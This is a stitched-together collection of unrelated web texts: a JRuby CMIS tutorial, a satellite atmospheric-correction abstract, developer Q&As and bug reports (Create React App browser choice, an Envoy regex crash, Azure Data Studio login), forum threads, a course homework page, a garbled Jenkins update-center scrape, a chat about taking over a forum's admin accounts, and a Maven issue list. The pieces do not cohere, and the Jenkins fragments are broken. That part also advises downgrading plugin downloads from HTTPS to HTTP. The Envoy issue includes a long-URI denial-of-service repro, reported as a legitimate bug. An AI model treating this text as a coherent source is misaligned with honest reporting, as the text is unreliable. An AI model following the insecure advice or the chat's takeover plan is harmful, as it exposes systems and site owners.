What you need First off, you need to install a CMIS repository on your system. In this article I'm going to use Alfresco 4.2.c Community Edition. Instructions on how to download and install Alfresco can be found here. Then you need to install JRuby on your system. I'm using rbenv to manage different Ruby implementations on my Mac. I won't go into the details of getting JRuby running on your system; just search on Google if you don't know how to set up JRuby. When you have JRuby set up on your system you can install the CMIS gem that we need: The CMIS gem is a CMIS client for JRuby. This gem uses the Apache Chemistry OpenCMIS Java libraries under the hood. I'm the author of this gem, so if it doesn't work as expected for you, blame me :-)

Create a session The first thing you need to do is to create a session: As you can see, creating a session is very simple and straightforward. You only have to specify a username, a password and the URL to the CMIS endpoint. CMIS supports both the AtomPub binding and the Web Services binding. However, the JRuby gem only supports the AtomPub binding, which is faster than the SOAP Web Services binding and usually a better choice. SOAP just sucks anyway, so I won't bother implementing support for it in the CMIS gem.
Most CMIS servers only provide one repository by default that you can connect to, and the code above automatically connects to the first repository that it finds. This is a different behavior compared to the OpenCMIS library, where you need to specify a repository explicitly every time you want to connect. I've chosen to implement this behavior to make the gem a little more convenient to work with. However, you can specify a different repository if you want to in JRuby; you can read about it in the documentation for the CMIS gem.

Create the target folder So now we have a session to work with. CMIS repositories are represented as a hierarchical tree of objects consisting of folders and documents, just like a local file system. The example below gets the root folder of the repository and creates a new folder called Images in the root folder. We also store a reference (image_folder) to the new folder so we can use it later: Now that we have a newly created folder, we can start to upload images to it: To upload the images we just call the create_cmis_document method on the folder object and pass in the name of the file and the full file path. Then we store the new object id in a variable so we can grab the image object from the repository using the get_object method on the session.

List the uploaded files To list the new files in our image folder we can execute the following code: First I'm just showcasing another way to get an object, by using the get_object_by_path method. Then I'm grabbing the children from the image folder and printing out the name of each file. This is just a very simple example of what you can do with the OpenCMIS library and the CMIS gem in JRuby. Please let me know if you build something more interesting with the CMIS gem! The complete code example can be found here.
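The code snippets the article refers to ("install the CMIS gem", "create a session", and so on) did not survive extraction. Below is a hedged reconstruction in one block: the method names create_cmis_document, get_object, get_object_by_path and children come from the prose above, but the gem install command, the session constructor and its option names are assumptions, so check the CMIS gem's own documentation for the exact API. It also needs JRuby and a running Alfresco instance, so treat it as a sketch rather than a drop-in script.

```ruby
# Install the gem first (assumed command):
#   jruby -S gem install cmis
require 'cmis'

# Session constructor and option names are assumptions - see the gem docs.
session = CMIS.create_session(
  username:    'admin',
  password:    'admin',
  service_url: 'http://localhost:8080/alfresco/cmisatom'
)

# Create an "Images" folder under the repository root.
root         = session.root_folder
image_folder = root.create_cmis_folder('Images')

# Upload every JPEG in the current directory into the new folder.
Dir.glob('*.jpg') do |file|
  id  = image_folder.create_cmis_document(File.basename(file),
                                          File.expand_path(file))
  doc = session.get_object(id)          # fetch the object back by id
  puts "Uploaded #{doc.name}"
end

# List the uploaded files via a path lookup.
session.get_object_by_path('/Images').children.each { |child| puts child.name }
```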
The free and open data access policy for Landsat-8 and Sentinel-2 satellite imagery has stimulated the development of atmospheric correction (AC) processors for generating Bottom-of-Atmosphere (BOA) products. Several entities have started to generate (or plan to generate in the short term) BOA reflectance products at global scale for the Landsat-8 and Sentinel-2 missions. To this end, the European Space Agency (ESA) and the National Aeronautics and Space Administration (NASA) have initiated the Atmospheric Correction Inter-comparison Exercise (ACIX) in the frame of the CEOS Cal/Val Working Group. ACIX is an international collaborative initiative to inter-compare a set of atmospheric correction (AC) processors for high-spatial-resolution optical sensors. The first ACIX experiment started in June 2016 with the aim of bringing together developers of state-of-the-art AC processors and studying the variations amongst the different approaches. The input data were Landsat-8 and Sentinel-2A imagery over various sites of different land cover types around the world, i.e. agricultural, desert, urban, snow and coastal areas. The description and conclusions of this first experiment are summarised in (Doxani et al., 2018). All the inter-comparison results can be found on the web site dedicated to ACIX I in the CEOS Cal/Val portal. The enhancements of the participating processors in ACIX I and the increasing interest from additional AC developers in being part of the experiment stimulated the continuation of ACIX and its second implementation (ACIX II). Similarly to the first exercise, ACIX II focuses on Landsat-8 and Sentinel-2 imagery over a set of test areas. Concerning Sentinel-2, the products of both the -2A and -2B missions are included in the input datasets. The test sites of ACIX II have been redefined, and more representative cases, concerning land cover and aerosol types, are included compared to those of ACIX I. Particular attention is also given to aquatic sites, i.e.
coastal and inland waters, which were analysed as a separate sub-category. Following the recommendations of ACIX participants and Earth Observation data users, an additional inter-comparison of cloud cover assessment was performed in parallel with ACIX, named the Cloud Masking Inter-comparison eXercise (CMIX). Cloud screening is a crucial step in the radiometric pre-processing of optical remotely sensed data and an important uncertainty contributor to the retrieval of accurate surface reflectance within an atmospheric correction process. Therefore, it was considered essential to analyse these two processing chains concurrently. The presentation will describe ACIX-II (land) and CMIX in detail and discuss early results and lessons learned.

AGU Fall Meeting Abstracts, December 2019. Keywords: 0402 Agricultural systems; 0426 Biosphere/atmosphere interactions; 0430 Computational methods and data processing; 0480 Remote sensing.
Why does VS Code open my React app in Edge instead of Chrome?

I just started a project with the create-react-app TypeScript template. When I do npm run dev it opens the Edge browser; I was expecting Chrome. Any idea how to make it open in Chrome?

Does this answer your question? create-react-app: How do I "npm start" with a specific browser?

To solve this, I needed to give a default setting in VS Code. It was empty, and when it's empty VS Code opens Edge - that's their favorite browser, it's hard-coded in their app. So open the VS Code settings and set the default to Chrome. Before I set the default to Chrome, it was empty ("").

From the Create React App documentation: By default, Create React App will open the default system browser, favoring Chrome on macOS. Specify a browser to override this behavior, or set it to none to disable it completely. If you need to customize the way the browser is launched, you can specify a node script instead. Any arguments passed to npm start will also be passed to this script, and the url where your app is served will be the last argument. Your script's file name must have the .js extension.

The easy answer is to change your default browser. However, if you want to keep Edge as your default browser, you can do this:

BROWSER=chrome npm start
BROWSER=chrome npm run dev

Consider that browser names differ by OS. For example, Chrome is google chrome on macOS, google-chrome on Linux and chrome on Windows.

Linux: "start": "BROWSER='google-chrome-stable' react-scripts start"
Windows: "start": "BROWSER='chrome' react-scripts start"
Mac: "start": "BROWSER='google chrome' react-scripts start"

This helped me, but I'll make an amendment. I had to do this (on Win10): "start": "set BROWSER='chrome'; react-scripts start"

I use Firefox for most of my web projects. However, in this instance I need Chrome, so I can't just change the default at the OS/IDE level.

Likely it opens in your default browser; this is an OS setting.
This question probably gives the answer: create-react-app: How do I "npm start" with a specific browser? In short: "By default, Create React App will open the default system browser, favoring Chrome on macOS," from the documentation. My guess is that your default browser is set to Edge, and if you set it to Chrome, it will open in Chrome instead. (Windows)

It may very well be a default web browser situation, in which case you'll need to search for Default apps --> click on the current browser under Web browser --> select your preferred browser.

I made the mistake of installing Microsoft Edge on my Mac. I didn't set it as the default web browser and verified that Chrome is the default. However, ever since then, when I run npm start, the development server insists on trying to launch the app in Edge. Even after deleting Edge, it prompts: "Choose Application - Where is Microsoft Edge?" So I simply chose Google Chrome at that prompt, which I had tried to avoid, but I couldn't quickly find an alternative.

The other answers aren't quite correct. VS Code's choice of which browser to open is a bit ... idiosyncratic. Chrome is used by default (if it's installed) on macOS, regardless of whether it's the OS's default browser. I don't have a Windows machine, but it sounds like Edge might be getting the same treatment there. To make VS Code use your OS's actual default browser, you'll need to prefix your npm script entry with an assignment statement that clears the value of the BROWSER variable. It'll look something like this:

"scripts": { "frontend": "BROWSER= npm start", ... }

Note the empty space after BROWSER= in the command above. This sets the value of the variable to [nothing], which triggers VS Code using your OS default browser.
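For a per-project default that survives across machines, Create React App also reads environment variables from a `.env` file in the project root, so the BROWSER setting can be checked into the repo instead of being edited into each script (browser names still differ per OS, as noted above):

```
# .env in the project root - read by react-scripts on `npm start`
BROWSER=chrome
# or disable auto-opening entirely:
# BROWSER=none
```

This keeps `package.json` untouched, which is handy when teammates on different OSes want different values.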
Route regex match fails for large URIs

Description: We've noticed that requests with a very long URI crash our Envoy service for routes defined using a regex matcher. We're not sure if it's due to some overflow bug in Envoy's regex parser, but ideally Envoy should not crash because of a long URI.

Repro steps: Define a route with a match regex like the following:

"match": { "regex": "/asdf/.*" }

and then make a request with a large URI:

val longString = "a" * (50 * 1024)
client.send("GET", "/asdf/{longString}")

We've gotten around it by using a prefix matcher instead, but this appears to be a potential DoS vulnerability if not a security issue. cc. @jmarantz

Yeah, regexes are like that. See the recent fun that happened at Cloudflare: https://blog.cloudflare.com/cloudflare-outage/ and, for more detail, https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/. I think you will be a lot happier with prefix-match :) So I wouldn't be surprised that a regex can make Envoy very slow. I also might expect that in some cases the regex library could throw during a match operation (not sure about this), and this path may not be well tested in Envoy. If that's an actual possibility, I'd say the action item for this bug is to repro and test a case where matching throws. Another course of action is to add RE2 capability to Envoy. RE2 has a more restricted regex language which prevents catastrophic backtracking, and it also executes the regexes it does accept much more quickly than std::regex.

@jmarantz erm, Cloudflare's regex was much more complex ((?:(?:\"|'|\]|\}|\\|\d|(?:nan|infinity|true|false|null|undefined|symbol|math)|\`|\-|\+)+[)]*;?((?:\s|-|~|!|{}|\|\||\+)*.*(?:.*=.*)))) and failed because of backtracking. The regex in this issue (/asdf/.*) is as trivial as it gets, and it's not acceptable for it to be a DoS vector. We should really move away from std::regex to RE2 or PCRE2 with limited backtracking.
For this reason I hate that we support regex matching at all. This type of situation is IMO almost unavoidable, though I agree with @PiotrSikora that we should do better on this simple case.

Agreed. In any case I'll also note that we've observed that std::regex does memory allocations during matching, so it's possible that this crash could have been an OOM. I'm pretty sure RE2 does not do allocations during matching; @yanavlasov might know for sure.

The .* matcher in std::regex is recursive. It runs out of the typical 1 MB stack with ~16k input. It will certainly OOM on 50k input. std::regex has known issues and is not safe for general-purpose use.

I think the POR here is going to be to add a new "safe_regex" type using https://github.com/google/re2 and deprecate the existing regex matchers in various places. I can take this on. FWIW this is the underlying bug: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=86164

I tested with libstdc++ and libc++. libstdc++ crashes with an OOM at ~50K string length and takes ~1000 usec per regex_match. libc++ doesn't OOM, but at 50K it takes ~9500 usec per regex_match. So libc++ may not be a great solution for this issue, since 1 msec of CPU is quite a lot. RE2 in comparison takes ~15 usec per FullMatch, independent of string size.

@jplevyak nice, thanks for looking at that. FYI I'm working on RE2.

@jplevyak thanks for the benchmark; we're on the same page that adding RE2 support (via a different safe_regex field, to keep the API backward compatible) is the way to go. I agree that neither std::regex implementation, in libstdc++ or libc++, is great. The point of using libc++ is not that it doesn't OOM or that it performs better; it's that it's what we use in fuzz testing, which is why the fuzzers weren't able to catch an issue like this.

Is it safe to assume that the issue potentially exists in configurations that define virtual_clusters match patterns (and not just route matches)?

@mhite yes. See https://github.com/envoyproxy/envoy/pull/7878 for the WIP fix.
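For readers following along, the safe_regex matcher discussed above is configured per route. The fragment below is a sketch of roughly what the repro's route would look like after migrating; the cluster name is invented, and the `google_re2 {}` engine selector reflects the field as introduced (later Envoy versions may treat it differently):

```yaml
match:
  safe_regex:
    google_re2: {}       # RE2 engine: linear-time, no backtracking
    regex: "/asdf/.*"
route:
  cluster: some_cluster  # illustrative cluster name
```

Because RE2 rejects patterns that would require backtracking, the same long-URI request that blew the std::regex stack completes in near-constant time, matching the benchmark numbers quoted above.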
I have, either bravely or foolishly, volunteered to design and host a Church website for a Church that currently has no electronic presence (beyond a Yahoo e-mail address). I'm planning static information pages, rolling news stories, group mailing lists, a calendar with events, and possibly podcasting sermons later on. The most important bit is that it isn't tied too heavily to one individual (me or anyone else), such that the website folds as and when that person leaves the area or becomes too busy. I mostly have experience with Drupal, which I'm not sure will do the job without a lot of hacking (specifically around the calendar/events issue), and Wordpress, which possibly will. Despite great plugins and an auto-updater, I'm not sold that this is the best solution for this type of site (although many do use it as such). Whatever I use has to be free and open source, and should ideally have a reasonably strong community offering plugins and support, so that if I'm hit by the proverbial bus, life (for the website at least) will go on. I'm not scared of a challenge and learning a new system, but it must be easy to maintain and update once in place. Have you any suggestions or practical experience to relay for a project of this type, both technical (the right CMS, features to try and those to avoid, good plugins) and human (how to achieve user buy-in from a diverse community)? On that note, the Church is outward-looking and has a diverse range of ages and backgrounds, so this may impact the choice of style and design. All comments appreciated.

Last edited by pwds; 22nd February 2010 at 03:28 PM. Reason: Typo

+1 - Wordpress is very easy to maintain and use, with lots of cool plug-ins... just make sure you're on the latest version to ensure no takeovers by skiddies putting pictures of devils on it; kids can be sad like that.

I found Joomla to be a godsend. I've actually done 4 Church sites so far, why I don't know.
If you set the restrictions for them to log in and submit articles to different categories and upload the newsletter with DOCman, they'll be happy!

Having tried to implement a calendar on a Wordpress site, I would say to avoid it if that is an important feature for you. I love Wordpress, but there are no really good calendar plugins that I've found - most I've tried either aren't being actively maintained or have theme issues that require hacking around. P.S. More than happy if someone can prove me wrong!

How easy is it to implement an event calendar in Joomla? Are there any good plugins for e-mail lists?

+1 for Joomla. I'm really getting into it, and it is surprisingly good when you sit down and give it time.

I'd say to use Joomla as well. Have just had a quick look at calendars for it and have found this extension: JEvents - Joomla! Extensions Directory. Also there is this list of extensions for e-mail lists: Mailing & Distribution Lists - Joomla! Extensions Directory

pwds (6th May 2010)

I'm still to get the "clients", that is to say the Pastor, to come and sit down and tell me what they want - or provide any content on request. At present the Church is mid name-change and has no logo, no "corporate colours", and newsletters are just typed sheets without design, so it's been really hard to actually get anything done beyond a vanilla site. That said, I have installed Joomla (and updated it), downloaded and unzipped the excellent Edugeek package, uploaded the orange theme via FTP (thanks guys), got maps and directions courtesy of Google, and got a calendar up. I've also got a backup strategy for them, so hopefully they won't lose everything in a hack/host change. Welcome to The Dales Christian Centre. The questions I have for now are related to the rokslideshow module. I uploaded the latest version direct from the makers and have it set to show images from a "comingsoon" directory.
I intend to create a dedicated FTP account for this (whose root - and only - folder will be the one defined for these images). The idea is that the end user can treat this as close to a normal Windows folder as possible, dragging news images in and deleting those for events that have passed. Does anyone have any suggestions on how to make this as "idiot proof" as possible for non-technical end users? I had been planning to add a Network Place in Windows, although I'm not sure if you can use SFTP for this. Does anyone have a better suggestion for management of these images? Is there a good plugin (including paid) where you can upload via the backend GUI and set an expiry against the image at the same time, so they're not having to remember to do it?

Lastly, from a design perspective, I've been drafted in to help with the design of our own Church as well, following their migration to Wordpress after a virus attack. I'll probably move the Dales website closer to the look of this Wordpress theme I hacked about a bit to their spec, so for the benefit of both Churches, have you got any design comments/suggestions? The development address is New Life Church Derby, which will change when I get the go-ahead to take it live.

e107 or Joomla are my recommendations.

I have in fact installed Joomla, with reference to the OP. Thank you.

Last edited by pwds; 6th May 2010 at 04:45 PM.

Most definitely Wordpress... by far the nicest CMS system I've used: huge community backing, great SEO (probably not too big a deal for a non-profit organisation), and easy to write custom themes for. I'm surprised at the suggestion of e107; having used it a couple of times (our old school site was built on it) I would personally avoid it at all costs - it also produces some really nasty code! Also, if you can't be arsed to write a custom theme, the themes out there are poor at the best of times.

Last edited by SteveP; 13th May 2010 at 12:16 PM.

I haven't had issues with e107.
If you work it properly, it is an effective CMS, but not as good as Joomla in that respect.
AZURE CONNECTION DOESN'T WORK

Type: Bug

"Failed to get subscriptions" message after logging in to Azure. I'm able to manage DBs from the Azure portal but not from Data Studio. The issue occurred after the update. Please fix it.

Azure Data Studio version: azuredatastudio 1.44.0 (31bee67f005648cdc9186f28ef39b4f1d6585e0f, 2023-05-19T16:52:43.653Z)
OS version: Darwin x64 22.4.0
Restricted Mode: No
Preview Features: Enabled

System Info:
CPUs: Apple M1 Pro (10 x 24)
GPU Status: 2d_canvas: enabled; canvas_oop_rasterization: disabled_off; direct_rendering_display_compositor: disabled_off_ok; gpu_compositing: enabled; metal: disabled_off; multiple_raster_threads: enabled_on; opengl: enabled_on; rasterization: enabled; raw_draw: disabled_off_ok; skia_renderer: enabled_on; video_decode: enabled; video_encode: enabled; vulkan: disabled_off; webgl: enabled; webgl2: enabled; webgpu: disabled_off
Load (avg): 5, 5, 6
Memory (System): 32.00GB (2.17GB free)
Screen Reader: no
VM: 0%
Extensions: none

Hi, the file is empty. Also attaching a screenshot of the exact error. 1-Azure Accounts.log

@malabarMCB have you tried removing and re-adding the accounts? This could help clear out any invalid state. Also, the AAD implementation was updated in 1.44 to use the SqlClient driver rather than MSAL.Net, which could have unexpected side effects. You could try disabling this update by unchecking the "Enable Sql Authentication Provider" option. It's unusual that the Azure log file would be empty if you're hitting account errors. Are you seeing any other errors in the Help -> Developer Tools console, or in the other log files?

As the message says, you need to refresh credentials by re-authenticating with AAD. You can either refresh credentials in the linked accounts pane or remove and re-add the account. If that doesn't work, to collect logs, make sure you reload ADS, and once you reproduce the error again you can find the logs either in the "Azure Accounts" output pane or in the Azure Accounts log file, as per above.
Once you open the file it will load logs from the process and populate for you.

@malabarMCB Do you have more than one Azure AD tenant under your account? I hit this issue as I have a few tenants, some without any subs. To fix it I had to add a tenant filter in settings.json to exclude the tenants that don't have subs.

Note: this could be related to #23210.

It didn't help.

Side note: when fetching subscriptions, we continue to use MSAL.JS, and this design is not related to the 'Enable Sql Authentication Provider' setting.

Tried to log out and log in a few times. Still the same error.

@malabarMCB Please try these steps: https://github.com/microsoft/azuredatastudio/issues/23286#issuecomment-1572668567 and let us know?

Closing due to inactivity.
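For reference, the tenant filter mentioned above goes into settings.json. The key name and value shape below are assumptions recalled from ADS 1.4x discussions, not verified against the docs, so check your version's settings reference before relying on it:

```jsonc
{
  // Illustrative only - verify the exact key name in your ADS version.
  // Listed tenant GUIDs are excluded from subscription fetching.
  "azure.tenant.config.filter": ["<tenant-guid-without-subscriptions>"]
}
```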
A change was made recently where, when you do "all kill" and target a monster (or presumably a person), the pet sometimes does not follow through with the attack, and instead you see a message over the pet's head which says "That cannot be seen". If I had to guess, I'd say that maybe it's related to an intended fix for pets teleporting into people's houses. It's causing problems in getting pets to attack where there's uneven terrain. I just did a T2A spawn at Damwin, and the lumpy ground in that area seemed to interfere with having the pet successfully attack. There was a rat mage standing a few tiles away from me and my superdragon, and I gave the "all kill" command repeatedly, but the dragon would not go onto the target and instead gave that message. I stepped closer and closer to it (with the dragon following), giving the command at each step, and the dragon finally went on target when we were standing 1 tile away from the rat mage. There were other incidents throughout the spawn like this, where my dragon was unable to go onto the target I wanted (yet that intended target was mana-dumping on me) and I had to flee the area to survive. Please make this work better, because otherwise it's gonna get tamers killed, including possibly in PvP. I'll record a video if it helps get across how goofy this is. In both PvP and PvM, if someone or something can be standing in what one expects to be "the open" and is able to cast spells or shoot arrows at me, it's critical that my tamer be able to target them successfully with "all kill" and have it work similarly. I believe I've seen symptoms of this before. In Destard (with its uneven terrain in spots), pets using melee attacks (such as Hiryus and Cu Sidhes) that are trying to kill almost-dead, fleeing monsters sometimes go crazy instead. The pet darts back and forth, unable to pathfind successfully to the monster.
It's been my impression for a while now that lumpy terrain like that seen in Destard and parts of T2A can mess up pets' line of sight to their intended target. On the flip side, I've seen where, at least in the past, monsters could teleport directly through a windowless wall into a private house. I saw this when I owned a house where Reapers that spawned nearby used to do it if someone was standing close enough to a wall. That house-teleportation deal was definitely a problem that was best gotten rid of. But all things considered, this new thing may be worse than the old house-teleportation thing. This new thing will affect my tamer much more often than any house-teleporting thing ever did. So yeah - - - pleeeeez make this work better, and like, if you reverted that change until pet line of sight over lumpy terrain was working better, I wouldn't complain. A video will probably be coming if peeps don't seem to get what it's like when this happens.
CS 655 - Homework

All homework must be completed individually. You may discuss the problems with others, but you must turn in your own work. You may either (1) email me your PDF or PS homework file, (2) give me your homework in class, (3) give me your homework during my office hours, or (4) slip your homework under my office door. If the homework assignment includes a programming component, you must email me your code. Do not make use of any other delivery method for your homework (e.g., carrier pigeons, my faculty mailbox).

Homework 1 Written (last update -- minor tweaks -- Wed Jan 25 20:16:43 EST 2006). Homework 1 Code. Homework 1 FAQ. Homework 1 Summary.

Homework 2 Written (last update -- minor tweak in exercise 3 example programs -- Fri Jan 27 08:35:43 EST 2006). Homework 2 Code (version 2) (last update -- fixes to make test -- Fri Jan 27 08:49:03 EST 2006). Homework 2 FAQ.

Homework 3 Written. Liskov et al.'s Abstraction Mechanisms in CLU. What is "Object-Oriented Programming"?. Homework 3 Code. Homework 3 FAQ.

Homework 4 Written (No code component. Work on your project proposal.)

Homework 5 Written. Homework 5 Code (version 3!). Homework 5 FAQ.
Simplify (for Windows) or Simplify (for Linux) or Simplify (for OS X) or Simplify (for Solaris) --- download one and rename it to $TOP/Simplify (i.e., put it in the same directory as nf.ml). Necula et al.'s CIL: Intermediate Language and Tools for Analysis and Transformation of C Programs. Detlefs, Nelson and Saxe's Simplify: A Theorem Prover for Program Checking. Manuvir Das' Unification-based pointer analysis with directional assignments (optional, the GOLF paper). Bush, Pincus and Sielaff's A Static Analyzer for Finding Dynamic Programming Errors (optional, the PREfix paper). Homework 5 CIL Precompile for x86/Cygwin (optional, but if you can't build CIL yourself or you're getting those "Misc.Fatal_errors" when compiling, just drop this one in). Applications With Objective Caml (really optional, but if you feel you need extra help with OCaml, this book probably has the answers -- you can also talk to me).

Random Somewhat-Related Humor - The Guru of Chelm (taking math too seriously) - Hamlet PowerPoint (problems with all-PowerPoint presentations) - Universal Poker (proof theory: why is Truth's opposite "Void"?) - How To Prove It (alternative techniques to structural induction) - Polynomial Hierarchy Collapses: Thousands Feared Tractable - GCC International (promoting international understanding) - Microsoft Buys TeX (note "What were we thinking?" and "third-party display driver") - Feel-Good Abstraction (at what level should we analyze and design?) - Parametric Worm (Microsoft security explained) - 1776 Computers - Security Important (system and user security) - Jobs Translated (meanings of terse utterances)

Other Similar Courses: Here are some example homeworks from similar courses at other universities (these should actually work as of 5pm Jan 17, but are probably a bit more "implementation-heavy" than what you'll see in
Symptoms: a plugin release has been announced ("plugin X version y.z"), but it is not available in the Update Center in my instance.

The update center in Jenkins can be replaced by defining the system property hudson.model.UpdateCenter.className. Invalidating the update-center JSON data for all the sites forces re-retrieval; doRestart(org.kohsuke.stapler.StaplerResponse rsp) performs a restart.

This plugin prevents broken builds due to bad checkins. A commit by a user is pushed to a branch; Jenkins then merges the changes to the main repository only if they do not break the build.

(translated) On a fresh Jenkins install, a common error is "This Jenkins instance appears to be offline", with errors appearing in the console.

This ensures that the update center will list your plugin correctly once the new plugin version is released. If this is missing, or does not point to your Jenkins wiki page, your plugin will not be included in the update center. Changelogs: once you have made your first release, you should add release notes to

(translated) The Tsinghua University mirror address for Jenkins plugins is mirrors.tuna..cn/jenkins/updates/update-center.json. To change the address: 1. open Jenkins system management

(translated) Summary: for small and mid-sized ops teams, Jenkins is a powerful everyday tool that removes many pain points. Its UI keeps the barrier to entry low, and its plugins provide authentication, auditing, conditional triggers, and chaining, letting ops engineers focus their energy on

Jenkins update center for Micro Focus Jenkins CI plugins. Description: this is an additional Jenkins update center providing the latest versions of the Jenkins plugins developed by Micro Focus. Plugins hosted on official Jenkins sites are not provided here. How to use: the Jenkins official way. Due to issues with current Jenkins releases, please use

Jenkins update center for ikedam plugins. Description: this is an additional Jenkins update center providing plugins developed by ikedam. Plugins hosted on official Jenkins sites are not provided here. How to use: to have your Jenkins access this update center, follow these instructions: install the UpdateSites Manager plugin in your Jenkins.

(translated) Problem description: when installing and configuring Jenkins, two situations come up frequently: 1. plugin installation fails; 2. the plugin appears to install successfully but has actually failed. Analysis: both cases usually come down to the update site; the site is hosted overseas, and access

Many thanks for this, it was very helpful indeed.
Also, as posting the data to the local server wasn't working in my case, I found that the same result can be achieved by just creating an updates directory in the Jenkins home (/var/lib/jenkins) and copying the default.json file into it.

jenkins-update-center-helper: utilities for customizing the update-center.json read by Jenkins for plugin repositories.

Issue: how do I configure the upstream source of my custom update centers? I have several versions of Jenkins in my CJP cluster, how

(translated) Plugin update center: after Jenkins is installed, the default plugin update-center address is updates.jenkins.io/update-center.json. Besides the official releases, some

23/09/2013 - Lately there have been several cases where we wanted to deliver beta versions of new plugins to interested users. To simplify this, we have created a new "experimental" update center, where alpha and beta releases of plugins will be available. Users who are

Update the Jenkins update center from the CLI. GitHub Gist: instantly share code, notes, and snippets.

Create a custom update-center.json. Precondition: URL-based download enabled; a server with WebDAV support is best. How to make it: create a base folder in which a plugins folder exists; put the custom plugin info in basefolder/plugins as pluginname.hpi and pluginname.wiki; the .wiki file should contain the detailed usage link for the plugin.

(translated) It's been a long time since I last installed Jenkins; the server I used before just kept working, and frustratingly I never hit this problem with my old Jenkins. Even more frustratingly, I tried many historical versions as well as the latest one, and even packaged and copied the running Jenkins program from the old server to this one.

The problem is I don't want to do it manually each time I want to update. I would like a way to automate the whole upgrade process. But you are right, I was thinking about managing the whole Jenkins installation in some kind of repository, updating it from another system and pushing the changes once the update

Changing the update center URL is probably easiest with the UpdateSites Manager plugin. Option 3: rewrite the contents of the cached metadata files in JENKINS_HOME/updates, e.g. default.json.
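The updates-directory workaround described above can be sketched in a few lines of shell. This is a sketch under stated assumptions, not an official procedure: the JENKINS_HOME path and the location of your pre-fetched default.json are placeholders to adjust.

```shell
# Sketch of the workaround above: pre-seed the update-center metadata
# instead of POSTing it to the running Jenkins. JENKINS_HOME and
# SRC_JSON are assumptions; adjust them to your setup.
JENKINS_HOME="${JENKINS_HOME:-/var/lib/jenkins}"
SRC_JSON="./default.json"   # update-center payload fetched beforehand

mkdir -p "$JENKINS_HOME/updates" 2>/dev/null \
  || echo "cannot create $JENKINS_HOME/updates (check permissions)" >&2

if [ -f "$SRC_JSON" ]; then
  cp "$SRC_JSON" "$JENKINS_HOME/updates/default.json"
  echo "seeded $JENKINS_HOME/updates/default.json"
else
  echo "fetch default.json first, then re-run" >&2
fi
```

After seeding the file, Jenkins still needs to be restarted (or "Check now" clicked) before the cached metadata is picked up.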
If the plugin doesn't appear in your Jenkins Update Centre, visit Manage Plugins / Advanced and click the "Check now" button to make Jenkins retrieve the latest update-center.json data.

Features: I'd like to keep the plugin as simple as possible, yet useful and effective.

The problem may be due to problems with the SSL certificate; by default Jenkins connects over HTTPS when, for example, it wants to download plugins for installation. Solution: to solve the above problem, change the protocol from HTTPS to HTTP in the file hudson.model.UpdateCenter.xml and restart Jenkins.
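The HTTPS-to-HTTP switch described above can be sketched as a one-line sed edit of the config file named in the text. The JENKINS_HOME path is an assumption; keep a backup, since downgrading to HTTP disables transport security for plugin downloads.

```shell
# Sketch of the HTTPS -> HTTP switch described above. JENKINS_HOME is
# an assumption; hudson.model.UpdateCenter.xml is the file named in
# the text. A backup is kept before editing.
JENKINS_HOME="${JENKINS_HOME:-/var/lib/jenkins}"
CFG="$JENKINS_HOME/hudson.model.UpdateCenter.xml"

if [ -f "$CFG" ]; then
  cp "$CFG" "$CFG.bak"
  # rewrite only the URL scheme of the update-center entry
  sed -i 's|https://updates.jenkins.io|http://updates.jenkins.io|' "$CFG"
  echo "rewrote $CFG (backup in $CFG.bak); now restart Jenkins"
else
  echo "no $CFG found; check JENKINS_HOME" >&2
fi
```

Note this is a workaround for broken certificate validation, not a fix; repairing the JVM's CA trust store is the safer long-term route.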
The loser who tried to hack LUE2 with snake's help.

Snakey: I hear you're starting a rebellion
Alienwarrior2002: Are you a friend of Heartless?
Alienwarrior2002: I'm going to hack a guy named Snake.
Alienwarrior2002: How fast can you use PHP?
Alienwarrior2002: Can you even do it?
Alienwarrior2002: He runs LUE2.
Alienwarrior2002: Okay. This guy named Snake runs LUE2.
Snakey: uh huh
Alienwarrior2002: He is a total douche.
Alienwarrior2002: Me and Heartless want to hack his site.
Snakey: yea totally
Alienwarrior2002: Well, we need the LUE2 accounts Heartless and Ugghayo to get Administrator status.
Snakey: it might be hard
Alienwarrior2002: How long will it take?
Snakey: lemme look
Alienwarrior2002: Days? Weeks? Months? Years?
Snakey: Can't you get back at him some other way?
Alienwarrior2002: I'm not just doing this to get back at him. I'm going to overthrow him completely.
Snakey: o rly?
Snakey: so you're going to be the kew admin?
Snakey: can i be a mod then?
Alienwarrior2002: You can be admin if you want.
Alienwarrior2002: Wait, though.
Alienwarrior2002: Heartless said you could.
Alienwarrior2002: Who are you on LUE2?
Snakey: a concerened user willing to overthrow tyranny!
Alienwarrior2002: No, I mean your username.
Snakey: what if you tell snake
Alienwarrior2002: HELL no.
Snakey: snake will never find out :)
Alienwarrior2002: I'm leading this. Why would I thro...

an internet tool that lets u go to a website but it uses a different web address. use so you can go to websites that are blocked from school or work. "dude they blocked this tight site" "who cares use proxies"

A very fast rush in StarCraft used by Terran and Protoss players involving building your Gateway/Barracks near your opponent's base in order to minimize walking distance for your troops. "I got owned by a proxy rush today."

a website that lets you go on to sites during school where you aren't supposed to be on. "I used a web proxy to go on to myspace during school."
Bug Scrub for Maven 3.2.0

A bug scrub is a review of all the bugs/issues for a specific target version to decide what issues will be addressed for the release. The mailing list thread starts here: http://mail-archives.apache.org/mod_mbox/maven-dev/201401.mbox/%3CCA%2BnPnMw6X9iWc93EB3Zvd_097qLHyTvnKDJO-MmyEZh83rx66w%40mail.gmail.com%3E

Issues moved out of scope
- http://jira.codehaus.org/browse/MNG-1977 Global dependency exclusions
- http://jira.codehaus.org/browse/MNG-3397 Change the POM to use attributes
- http://jira.codehaus.org/browse/MNG-5102 Mixin POM fragments
- http://jira.codehaus.org/browse/MNG-2199 Version ranges not supported for parent artifacts
- http://jira.codehaus.org/browse/MNG-2216 Add default encodings section to POM
- http://jira.codehaus.org/browse/MNG-3826 Add profile activation when project version matches a regex
- http://jira.codehaus.org/browse/MNG-2316 Add info to the poms for dependencies that implement an API or provide other dependencies
- http://jira.codehaus.org/browse/MNG-3326 Profile Deactivation Configuration
- http://jira.codehaus.org/browse/MNG-2557 Various enhancements to profiles
- http://jira.codehaus.org/browse/MNG-2598 Profile element in POM should support overriding project.build.directory (WONTFIX candidate?)
- http://jira.codehaus.org/browse/MNG-3726 Extend POM model to support declaration of IRC channels
- http://jira.codehaus.org/browse/MNG-624 Automatic parent versioning
- http://jira.codehaus.org/browse/MNG-4506 Split site deployment URLs into release vs. snapshot, just like artifacts
- http://jira.codehaus.org/browse/MNG-3879 Dependency map and documentation
- http://jira.codehaus.org/browse/MNG-2916 Default message and profile help messages
